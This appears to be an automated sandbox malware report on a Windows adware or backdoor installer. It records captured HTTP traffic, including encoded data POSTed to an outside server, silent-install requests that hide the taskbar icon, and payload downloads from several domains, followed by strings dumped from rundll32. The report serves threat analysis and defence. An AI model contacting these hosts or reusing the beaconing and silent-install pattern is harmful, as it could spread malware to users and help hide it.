..O.V.v.c.E.m.j.a.u.C.K.F.k.z.3./.X.Z.A.E.M.m.8.2.D.V.9.t.T.M.L.Q.M.d.O.D.t.u.t.M.L.U.5.7.Q.x.n.4.E.u.B.h.k.z.S.S.B.E.1.7.r.4.I.F.G.X.6.s.b.i.2.J.2.E.P.i.O.U.a.g.O./.g. .J.Q.v.g.U.A.c.8.u.8.M.Z.p.5.X.r.g.D.k.l.b.G.x.X.B.l.B.2.u.S.R.k.N.I.7.M.0.T.q././.R.B.R.Q.A.0.I.P.B.G.r.J.D.H.4.P.p.s.f.C.k.3.2.B./.2.0.l.S./.1.L.b.4.Z.1.j.8.4.f.B.M.L.0./.Q.m.B.X.R.f.g.L.0.P.U.h.O.Y.x.9.A.Y.7.E.u.V.8.p.8.I.S.Y.0.b.h.V.t.y.G.l.h.3.C.q.2.a.6.M.U.B. .b. .g.j.9.i.E.E.U.4.E.r.5.C.k.P.b.1. .L.M.q.6.P.5.r.f.W.S.x.j.z.4.n./.i.N.i.v.6.D.f.X.P.M.9.Z.O.Y.9.2.V.w.i.P.P.t.8.L.6.v.M.I.i.O.r.0.t.W.6./.i./.3.9.W.s.9.L.c.B.l.4.B.b.O.8.s.u.x.i.F.o.h.Q.8.a.4.N./.k.j.n. .M. .l.J.S.I.V.I.c.j.A.a.I.X.x.u.o.6.H.Q.3.Y.A.V.X.0.g.O.O.S.g.z.d.H.Z.i.H.W.O.z.z.x.9.X.E.K.y.B.7.H.y.m.d.8.P.5.i.7.E.2. .E.n.1.7.4.3.q.V.w.a.K.W.P.g.A.5.c.z.b.B.J.v.A.n.i.G.O.S.T.1.L.y.M.L.J.j.0.2.h.V. .4.e.u.I.g.M.8.6.o.X.l.a.u.C.B.0.L.g.o.q.b.u.D.f.A.N.W.h.m.R.Z.Z.5.g.z.F.B.2.4.M.V.w.5.u.m.R.j.E.H.E.0.g.v.f.S.R.R.A.W.U.H.e.r.N.V.e.2.y.w.1.o.w.z.D.5.S.B.j.M.u.M.e.N.r.P.q.p.Y.5.o./.e.6.T.c.i. .w.h.b.S.u.m.5.l.0.U.K. .3.X.c.K./.P.m.f.v.Y.g.O.q./.6.r.x.2.q.0.6.3.y.A.M.d.w.9.F.O.h.B.K.3.j.u.B.z.q.5.y.H.Y.H.A.P. .Q.H.S.y.K.6.s.F.s.7.q.d.o.t.D.y.s.g.B.Z.e.m.t./.z.Y.7.A.M.d.e.7.n.a.W.v.B.H.J.D.S.5.5.O.u.v.x.n.0.8.j.S.p.w.X.e.F.X.p.G.j.a.p.F.t.J.e.y.8.X.4.h.V.d.W.S.D.3.C.Q.N.k.L.i.e.D.T.R.6.6.P.g.l.l.U.m.5.w.4.1.J.L.p.x.m.U.j.f.q.Q.A.R.q.a.S.o.o.H.h.K.2.r.0.e.j.9.Q.7.p.q.b.W.E.9.r.R.X.f./.o.O.P.8.v.k.q.U.4.M.R.V.A.P.v./.y.h.J.j.c.k.8.S.S.b.p.K.c.O.A.X.D.X.Y.G.6.B.c.J.h.l.X.e.2.u.w.n.a.

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.mytholiday.com

Content-Length: 3807

Cache-Control: no-cache

data=iIVyuxWUwnlz0PRJLF4JQ&report=VdXF6KKpvgk8eQltvqQkQlHlVcSxLOfSsfrrHa1w7XOmrJq45pJDC0vfFjauGToKOUB9Om87YsoBHA7GrgHtFTDUjBS2S00q9Vgdf4J/9sqQu3FwVNLfEDtUdsoli3ufqWlCXJIZKgGDC/8wXVRyfDDS408Y tl3Hujp2Gyncogq3ROEfvqdaA1eHfy4F6wv0NDwd1ThdAdgoAihodN zJ7EZAV6U128aFZmQYkegWIOfSJQ1BSV6uzaOP4Ifm/N00BB064qbDTCSru9FvdqC9MGY8ylwSpEEMAhK6xHGAObGPI8IzaLYQX9wqwbchSh0UmY0vLE033oHbwl9bzsFq70Fl8uMp0rtVu3NpctmnFvgMAhx3PWQeBRi1rGFqnBJgZ8eQOcIhGfmxhOIzjExeC2ndmugBioOZ65pDYw03J92lh4Y78Y1fUwiXRjTwBLbxVJnRZY2JgtJrUQNYeAXmJHvFNKRRPJJz8GFoj4v6BQeiQNfD3DPbhFx/IV3x9eX5In12ZVRqRH1YWL6/3hgJU4tIdz7ZksNMVlLxOdHnkeZq5DQnlBnIQ8tAht1mlhcRKMU8bK2z2el3s82LnUHY8ACFZK9Rp/EPDsvlBmKjLKgm5TDhzXY9gtHgvyAtz2CD etNYI6jw9GG9NEGhGOlS9SI82s4bTG4Z6kYVOp4ApTJy/4KH33lDTJsPHlsDtsJTCOS rawUOUkGp/wRbZ1BhU G1npbjxKduXSSwy4hZN8gCtiaRThNzAwHDUshCf83y3Nr8LoDzmUdV6pyidygSWilVwHqmKhJX0JI9V5eOy19lelJw8/fs7kST62nmQ0op7s31RavoH5jO194MHcrOTfYJfUoXARwZHilV9uxbWcRWT6ocZf19h4zkWPMjMWR1FXxJZM7AzZ2 FJYgp6zeAimAw5aJ3 nOdMI1hWp4V2gSsZhAYXdgm3eXVH/g1ECDFc6yPw55QJwRR3tZFluaXs8z9a5tvmg qxHx3SeibFtYP/MG1ZormIPh5eiGjlTDBEivUMPM uE0TM93J5vENnyXU2Ec4D P33eTS9FOn9xO0b6euAwx5ljDFVQ5tnQAZHAneOE71Mo eay12oI1ScZkybwZHP6SUYz kcBU1jLQWKf3h2OAZlXuw0YapPV6NrsCoYME3iVT2bCa3ORPXskSDXfMZJopmuJ/JF7FSgC3oRoyKw4Z9QuqE6BQyi21lS/rjMC2yxMn6W cKuQkjl0LGDQicF0Tu5Hg2TR37y9dmr5gfXGNPZ

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:50 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.storesis.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:32 GMT

Content-Type: text/html

Content-Length: 9710

Connection: close

Content-Disposition: attachment; filename="4.txt"

..e.n.p.4.H.k.g.f.B.P.t.v.e.c.u.h.a.b.k.J.W.P.x.l.m.L.v.Q.Z.c.q.z.u./.H.o.p.C.O.b.w.0.V.m.c.e.v.0.R.b.h.U.b.R. .9.O.V.S.U.L.t.L.0.j.v. .5.u.t.6.H.a.5.Q.w.V.U.r.U.y.q.m.G.U.k.A.9.Y.q.D.F.l.c.O.v.i.n.v.X.X.f.N.x.B.e.c.l.v.5.g.L.3.a.Z.O.F.u.o.X.V.j.E.l.Y.l.R. .K.G.l.o.E.i.O.h.3.E.Z.A.e.R.B.7.I.p.r.g.j.R.B.k.A.0.x.m.F.J.s.x.R.z.p.O.3.A.t.i.R.r.j.m.S.e.L.g.7.M.l.W.E.Z.5.I.R.U.v.x.w.h./.1.y.X.b.y.X.p.t.m.T.5.g.n.H.M.h.a.7.B.L./.h.7.M.t.u.y.M.Y.J.5.o.6.R.s.1.p.G.F.L.X.7.i.c.R.I.K. .y.c.J.F.b.Y.I.L.l.G.E.R.B.h.V.I.C.N.H.F.Y.C.5.6.i.I.J.v.G. .g.q.l.q.V.H.A.4. .2.i.F.R.V.k.H.d.U. .o.w.8.6./.z.w.l.0.Y.U.O.T.b.J.E.y.w.r.y./.j.f.F.V.h.W.C.p.p.f.3.x.c.Y.z.i.Q.B.y.6.z.f.s.1.b.6.O.D.M.X.M.c.a.Y.k.K.7.P.r.0.m.F.n.T.R.r.H.J.J.Q.T.s.s.K.j.g.2.A.i.u.Q.t.P.d.P.h.B.A.P.j.S.a.G.D.s.f.0.w.O.F.a.e.r.c.B.z.8.Z.t.n.o.T.t.Z.E.s.n.Q.h.u.d.R.E.x.4.l.c.I.7.m.C.y.G.Z.F.G.e.W.d.p.p.v.A.V.T.s.S.q.E.j.Q.y.5.X.2.k.7.T.p.v.n.n.e.Q.o.q.o.1.R.j.3.c.B.w.v.O.I.o.G.a.u.I.k.Q.G.M.Q. .I.m.Q.U.p.D.u.A.V.F.C.2.S.Y.4.9.T.Z.3.m.L.e.5.r.p.Y.8.t.H.7.w.P.d.O.s.t.v.W.h.S.6.V.D.a.e.L.8.3.D.R.s.C.3.l.7.J.Y.B.8.e.u.w.T.O.6.0.k.O.P.K.o.S.M.p.l.Q.2.C.3.U.0.U.B.V.1.Q.5.G.y.W.z.x.8.V.B.a.i.F.m./.e.m.B.p.U.H.v.A.r.C.Q./.h.d.4.A.v.K.3.F.x.A.V.R.V.a.b.S.T.A.S.G.F.3.d.H. .I.J.g.r.W.T.q.a.O.q.R.C.E.U.7.b.9.a.S.L.g.R.R.4.m.s.s.E.8.M.8.B.n.M.Z.6. .t.b./.X.Q.R.d.b.c.A.w.a.k.B.l.2.x.5.m.U.x.l.f.m.T.u.C.N.j.s.N.9.j.X.C.K.8.A.E.y.D.W.q.1.F.r.x.X.G.3.q.K.H.6.C. .a.Z.w.T.m.Q.P.s.a.J.V.0.c.f.9.a.X.D.9.t.o.X.l.o.B.I.K.3.r.a.d.D.R.c.w.p.6.c.W.p.X.6.P.7.d.S.V.3.i.w.p.a.g.T.u.w.m.z.e.0.

<<< skipped >>>

GET /hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

Host: linq-goody-best.xyz

HTTP/1.1 200 OK

Server: openresty

Date: Sat, 09 May 2015 23:05:58 GMT

Content-Type: application/octet-stream

Content-Length: 547095

Connection: close

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

Content-Description: File Transfer

Access-Control-Expose-Headers: Content-Length

Content-Disposition: attachment; filename*=utf-8''download.exe; filename="download.exe"

..r8...bF.Yx.......j.A.{.].k.......h.....E.......D..-JD..^RH..........e......U......%..>......Y.L{.Dk..x....4..<..|.nj..#....R.-y/.dZ....G ....!...t...c......?...S......._3...[.....-gx......;.."gx.7.WI>\ z|..j.d.....c..}.D...5....t.......6..*..y.f..........Q.....K(........n.jI...Mth#...{.|?..w.=..X.......2D.5y.B..................lc.F........=....da.......H.-...L>.[.2....SY...1.c..7....I.^.,N=..M.y......:kFY...i....5. .y...^7..A-..7Y4.M"......D.?...r......>...X..=.clI...........s.c.q3.)4.1;s .On..f=...F'%.h....{..0..X...*'..N./..T...\a..Z..1U-..6P...U.n...V<X...G........~.....MrN.....k.....L....r../>3.Qczvr........z>T..@.a..n...<P.^r...3.`o.p...l.@.{9i{..c..^..G.*.........AZ.2....`...\n......Xe.c. 222.y.DG......,.0.9.....Wi..w....#n_../R..3.%~.< .v.Iw/. .Qt....>....`.!..d..*.... .D.7g.P..8..._..{.x^.f..o.*.}m,..........3 ..T.Vu..W...rS.2.i{..@..uA4...>V2.w....v.F..e.9..E.....P....n(.P.eL.F&.r#.0....R.=...5..0.1.9V.yj..%..........(..&C.2XN;..h.......x.%#.1T1.(3...R.......wD.~....I.(.lB.B.......&......#9........]...^..S...k&6.d'..04.....MNf.55..;.IF. ...w....N.S.<?.....<....z.>r.dD.{b6......*}4.[...R...X.....%^{%r...`r6..)Q...^....2 ...OC#9...NqK..S.]X'.../.(g.UF..5..:njCP..~.X...G....#....a.....k..J.Z.......\:|..X..s%.L...Y...^Y.H..@..dA..'kW.A.s..;......k..x......i...z..............2z...?.B...=n......OC3..R.... 0 .. A..f.t.....R3... |...Iin....7'.m'v...nD..9.,..ua.@Q..4.O..:a.....l_...g8.&....:..5......v...Cq..^..j....4....P.K.[.....R...$if...M.,.g.F..._p.........x.".

<<< skipped >>>

POST / HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: r1.mytholiday.com

Content-Length: 4532

Cache-Control: no-cache

data=39ZH7x2d1y6Icv1defocsdCTnOTqMgTdh3aIlyGSKJupDB4MrUsKm9xC 4w3Nc7bRRe9qw3P1xG0ANsWnJCVI2r Z5mH5aBn8FttrxxFGN1 IHbZ/HJZ/5lWvWtjmwqqkP6Bb NPW5ZpO GGZw6CBzegOG5 Ds4X6XSMPUjpfUQ8YKnWxecsSPOyABHcJMPJ8UslQJf4MqVqJQkYapEqeOyASZaWejNcwWt75MWIp3BQRO2SbwG/j8 MlZeCZAhU2ekXxV7bOA5gzat/ jtIz1NuNs2bZG/mD8umcTxGiF4Xjh96NkJwl7kb0ImZ1eST4oLRQkxS3Eg/SBzcgKQg2ik4ySJRJMBgpJeaznLYPhQBbsPZeWqUbtYpAAwr1wEG/32Xx8UqAzs51Cy6yeuQDKysZoxcU7Jjj1sF7Lx7CVwEoXkb6uvjUHdUKkYOdpCuqwkQdTIukh6/hmlCmvPaGjROOoUG4wSwdN wFzRYPZK27pnbCVvOr92Pho2lNpU1 cgCJACBH9QUtU2cyUel M6fT6v76dUCO9zcKd7lcDJ31PfjCOIsWx3pluarLfgtu9FxzdLFqgoLK1bS0iHQdVfE1t7SPDmyeqeH9QTWlzrI7Ba6SDeFAYy4gy8Vd7PouBbsmamo02OosmPriOCbX5FTf lzbLeZjMQizliuysVKLYLJ5yuNqI6jR9BfZ2IA6oLmgqRfigYGqGYXGWnsZV8hROtIuqVAFTRiCLnkYGm3hRCBUME7zDfF66SKSOMbVfy48JXUsyClUGlWjdiP5VE8x4A/TBo3awyQvB kXhArJRqG Y0tSmjhskMi002QiFM4R21vdR24GYhttiSnDNb8s6iFePiR0NiuWFkDo67otxZf8hRX6oflpniVzlR B8dyKCZO18N3GfCMWoUu12PDBxPE5mgsu&report=QH8R3fNPd1n9AgdnikFSDxwHv6AB55R ilZSoU8gPOuyCI8PPAlwYAw5idmolx/avfKXiqKIqpjTRZ 0nXC3M4A9DMXyluhnxUMbsE AjOPZF/M3Ac2yxUOibgYmjc3K/E67aHyjeutBzsVNLOSDWrU1YO6ljydc7GUJDj8A3zl0a /OaNgyncMe3FDp/fZ088wqQnolFlFKaKX2PQQgJhwSZtZ ZVCr5b5TKMrRzK3LmddoQKljfzDwFUUL95Ic Yzb1wTyHtXSe8eZx2Dd2j3GOFbup28vZ/3VAMv8uFyRaHU3/3TEw0J8HqQX0xvUX0beVUlSiu6QwP2wuGZlTfqvFjsyI0lx/GYbrztT3arOvC5

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:03 GMT

Content-Type: application/json; charset=UTF-8

Content-Length: 2

Connection: close

{}..

GET /?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: goldavid.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:04 GMT

Content-Type: application/octet-stream

Content-Length: 2012618

Connection: close

Content-Disposition: attachment; filename="9Bgp6JPux0JTfR.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.....$V........'.................,.@.........M~.l....$Dh.O ...d.....< .....8\.....4X|....0Tx....,Pt....(L@....;.b...1..i.}..t)......N.....zV3....0F-....,t. ...lI~y....(Lp.......n.....Y.Nm.3O.t.9M).o.W.x..s..6...iS8..#..I..*.........c.-....xC...."...Cm.3.3v.:M)...W....s..4...iS^}.#..I.X.......xS.c.-.....Co.......Om.3.....M).`.....8\.....4X|....0Tx....,.u...Ee.p....$Hlp... Ec.....@......<......8\.....4Xl....0Vx....,Pt....)Lp....4El....zSe.....@d.....<`.....8\.....4X|0L...Tx.T..,.t...d#L.....$Hl.... Dh.....@......<`.....8\.....4X|....0Tx....,Pt...%.L0....$Hl.... $m.....@d.....<`.....8\.....4X|...tDTx....,Pd...L-Lp....$Hl.... Dh....|n......<P....t=\.....x]|....0Tx....,.t...`I8......Ll.$.. .l.....@d.....<`.....8.....s4X|@...04s....,Pz....(Lp....$Hl.....6...... ......<`.....3\.....4X|....pTx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp....$Hl.... Dh.....@d.....<`.....8\.....4X|....0Tx....,Pt....(Lp...U......?...`;...xd...4E.0l:...a.C.C..IH|..cI8...)..(P!.PkA$.x....,...?4.eLi.;%?.......N..........f..E.....cM4o:....-kv....h.r.x.. H9.XS.(.=.9.qTD9J.....1.W...9...E..f.,.O ....c.&.,..t7....t..W...`...<`.j.p.:.@......i.h.3...9|. ..0X%%.Q|-Rh..,Y..|p...(.5.q..$.....?u...3..........qh.$...........-p_......cK....|..D..\..30Q.=`..$..`x...}.......].1......\./....P|.O.Z.!t.(6.(P.X7..q.@...@ ....3...l....B......X.e.A...8...C....=.

<<< skipped >>>

GET /?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: loveshero.net

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:18 GMT

Content-Type: application/octet-stream

Content-Length: 1139531

Connection: close

Content-Disposition: attachment; filename="2UzDN7fW9Yl4sH.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z.Gc...!.......nT.....-...-.........tD.c......[.........7Q.OIj}d..........= [.arv.........Lr>M_Fdf........S., 'AWq9..........0>a.Sfj...........#..Efb.........PN6&X@bb.........LRY.GIs}..........." uHmy..........*4 R.Xi..........o.2ZEsx..........%8=IEu..........K.k~..*8.........DQ.gz.-8.........<]..A']nt.........W.<M].Yo.........Vn}...#0........7Q................rj..!c......M.r......yj[..............zk\M>/ ..........{l]N?0!...........m^ON....A......A\:792.Sfj...........q V.gs........_..6&.(...............2....U\....Q.,..B...\.l...(a....R...f&|#.q8|.,..b...W@.2.aHq...Ir...lN...QXa..$Y.... YC..Ah.......w8.J;`....(......xiZK.-............j[L=..p........Izk\M>? ..........{l]N?5!..........|i^O@1"..........mn_PA"#..........~o0QC3....l.......p!SCT&...........qbSD5&...........rcTE6'...........sdUF7(.......X]..4eVG8).......q...tfWH9*...........vgXI: ...........wn.J;,....E......xiZK<-.............:8\..RG........zk\.>/ ..........{,]N..Esw........|}_O@#"..........}n_PA2#T..'......~o.RB3$U..........paRC4%.............? V&...........rcTC7'...........s$UFu(...........teVG8)...........ufWH9*...........vgXI: ...........whYJ;,...........xiZK<-...........yj[L=............zk\M>/ ..........{l]N?0!..........|m^O@1"..........}n_PA2#..........~o`QB3$...........paRC4%...........qbSD5&...........rcTE6'...........sdUF7(...........teVG8)...........ufWH9*...........vgXI: ...........whYJ;,...........xiZK<-..Uz.P(....xzh..k.#.....?...?...0o ..7...#...{...o.d.S.......<9.c....g.E.\.E.Vd.n_P..~.......f[..OaAC

<<< skipped >>>

GET /?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: c1.storesis.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:52 GMT

Content-Type: text/html

Content-Length: 8562

Connection: close

Content-Disposition: attachment; filename="6.txt"

..T.m.U.x.B.Q.b.d.M.U.9.9.U.d.a.W.Y.S.0.N.h.g.U.y.G.X.P.a.Y.B.C.K.k.B./.U.z.e.X.S. .A.h.h.2.4.j.4.D.L.6.T.8.y.X.F.o.r.A.K.G.r.m.p.T.c.U.E.I.5.1.N.A.b.U.1.Z.7.q.4.2.a.n.I.v.l.9.C.4.a.O.m.D.F.2.y.O.G.y.A.H.P.C.g.U.S.i.f.R.V.j.y.v.A.z.o.e.1.r.v.k.N.a.9.c.3.W.B.C.P.h.E.J.l.U.b.n.a.d.H.h.z.9.t.P.H.h.f.g.G.f.5.G.H./.n.q.V.S.Q.p.N.k.p.B.z.r.W.J.e.K. .t.R.Q.a.e.T.6.q.r.E.W.S.p.O.X.X.Q.f.i.6.K.G.w.X.F.S.w.R.O.9.S.l.g.F.z.w.e./.G.s.o.b.v.l.P.b.O.u.j.N.a.V.A.a.s.H.V.F.b.n.2.i.x.9.n.q.S.c.v.X.h.Z.a.s.P.Y.K.f.e.z.q.d.w.T.r.F.u.n.z.1.x.8.P.D.3.L.I.y.s.0.u.k.r.t.c.H.v.9.S.b.V.z.g.6.M.K.P.O.K.c./.j.1.2.0.Q.c.Z.O.Z.w.Y.a.H.d.r.E.v.j.K.4.Q.E.Z.L.s.M.v.n.9.6.7.a.c.q.2.6./.S.f.R.v.q.5.T.5.D.u.P.R.d.x.V.w.1.9.x.w.c.C.z.4.W.B.a. .m.L.P.p.z.Y.i.L.q.g.e.D.b.q.r.v.t.w.3.s.9.F.T.i./.h.S. .V.2.U.2. ./.r.U.3.7.3.n.X.q.x.B.5.c.U.F.I.G.n.k.t.L.m.S.O.s.n.t./.P.B.8.e.K.b.c.2.y.9.H.c./.7.2.s. .c.2.f.T.L.t.N.v.c.J.7.M.a.y.g. .p.z.h.M.R.Z.n.o.v.o.W.C.v.h.d.B.J.B./.T.s.K.f.K.q./.5.8.u.V.x.1.X.O.m.I.r.T.h.b.U.C.1. .G.E.Y.H.6.7.6.p.M.S.G.t.C.5.y.u.W.X.w.Z.f.T.n. .A.6.r.H.w.v.o.O.m.D.K.j.7.u.3.a.1.k.2.U.t.y.r.b.G.f.u.a.r.g.i.1.e.2.r.r.r.E.n.V.r.c.W.8.c.W.p.f.o.q.l.p.G.d.k.E.M.Y.x.a.A.y.c.V.4.N.K.w.8.Q.M.v.f.X.C.8.j./.H./.N.Q.Z.i.u.0.t.a.W.m.c.j.g.w.j.m.q.5.8.i.k.z.l.4.1.K.s.0.f.k.b.N.5.v.b.i.z.G.t.I.L.j.I.Y.1.H.Y.y.8.7.A.J.h.U.q.J.N.T.B.C.q.d.o.b.5.l.K.u.N.y. .9.D.W.J.d.E.0.n.T.f.c.f.h.9.N.w.k.y.q.C.3.H.b.A.W.E.r.q.u.9.f.i.o.d.9.i.G.5.E.4.Z.M.k.t.z.c.A.r.O.Y.1.N.A.Z.n.h.p.J.W.i.d.6.f.F.y.X.8.x.P.f.O.6.B.p.g.d.7.A.f.1.r.C.z.m.v.u.U.m.g.j.P.M.3.n.J.O.

<<< skipped >>>

GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1

Range: bytes=0-

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7

Host: storestral.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: ngx_openresty

Date: Sat, 09 May 2015 23:06:34 GMT

Content-Type: application/octet-stream

Content-Length: 1962996

Connection: close

Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"

Content-Transfer-Encoding: binary

Access-Control-Allow-Origin: *

..z......A3.....U........;...;.......Y..........[..\..>o.%:..(......S[..... ...qD.D...}M.;t..n(.....P\..=..,E..=l.3G..1f..... u..L...u.....SI..<a..w..73.=... d..T...q..4...E...n..I..k*..^..9|..J..]:..'...R...d.K`...T..V..9b..j...k..2..)P..!c..A..#M.T....s..Q..-\..l..bU..&s..D.."m.E...?y..J..$}..4.. k...S..\.."m.*U.. d..]...h..#...O...x.Ua..3d..T...%..2..?{..)..%d..j6.BJ..11..Q..<q......~.."..YE..}".%F..#|..\..5}..\..BS..,...C..;;..P..?z.VU..cY..m...k..,..-X..=t.3G..1f.....1~..Y..?j..{...N..)l..Z..>a..D..4 ..c...v..!..5*...o."d..r...C..4|..L..B*..u..X....a..O..)F..U...`......w..#...M..jB..g..9F..\..*|..2...h..9...E...r.?_...O..u..4i..h...q..%..J...:o..K...5......S..{..&!..t..]....D.E...i<.M....m..c...v..!...R...i..}..m*..D..w?..L...}.."...N..gu..F..1d.W...kx..A...u../...I...H.&}..=`./T...5..O..8V..t.......%.2L..>y.-s..`D..`..:n..9..=z...o.(\...`. t..hh..^..4O..y..1...}l.EP..gz..c..l~..{../,..9...g...3..]..u:.3g../~..V..U ..e..,G...J.E~...\.:@...Z.....S~.....0J...a.!b...Y..w..ie..{..:~.....[H..14.8j..u:.:e...@..]..&!..7...X...%.6k..$f.:G..o~..z...p..q..QD..<1.D_...0..... f..y..7u..x...s...q.=j...r..X..>c..[..2J..s..\X..zF.$@...1.]....V..S..8R.....,c...e.2k..`x.JW.. ..l..%I..:..M...'k.AZ..4_.LA..RK..\..2}..2..bI..<a..M..9l.Z...a#.....Y/..s..^...;e..A...a.E...m'.....R*..q..Q...Be..M..9g.'Y..z!......}..)..U...Bi..\..<W..@..z#..J...k..2...T..j2.A...e%.A...b .....jC......I..Bu..I.."k..V..e2..`..6V..(...u...O......J.3I..s"..H..#N.....0N..&w..k...d..R..)w..o..3O.....^...%/..c..aA..}..0A..|

<<< skipped >>>

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

rundll32.exe_1432:

.text

.text

`.data

`.data

.rsrc

.rsrc

msvcrt.dll

msvcrt.dll

KERNEL32.dll

KERNEL32.dll

NTDLL.DLL

NTDLL.DLL

GDI32.dll

GDI32.dll

USER32.dll

USER32.dll

IMAGEHLP.dll

IMAGEHLP.dll

rundll32.pdb

rundll32.pdb

.....eZXnnnnnnnnnnnn3

.....eZXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

....eDXnnnnnnnnnnnn3

...eDXnnnnnnnnnnnn,

...eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

.eDXnnnnnnnnnnnn,

%Xnnnnnnnnnnnnnnn1

%Xnnnnnnnnnnnnnnn1

O3$dS7"%U9

O3$dS7"%U9

.manifest

.manifest

5.1.2600.5512 (xpsp.080413-2105)

5.1.2600.5512 (xpsp.080413-2105)

RUNDLL.EXE

RUNDLL.EXE

Windows

Windows

Operating System

Operating System

5.1.2600.5512

5.1.2600.5512

YThere is not enough memory to run the file %s.

YThere is not enough memory to run the file %s.

Please close other windows and try again.

Please close other windows and try again.

9The file %s or one of its components could not be opened.

9The file %s or one of its components could not be opened.

0The file %s or one of its components cannot run.

0The file %s or one of its components cannot run.

MThe file %s or one of its components requires a different version of Windows.

MThe file %s or one of its components requires a different version of Windows.

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"

Error in %s

Error in %s

Missing entry:%s

Missing entry:%s

Error loading %s

Error loading %s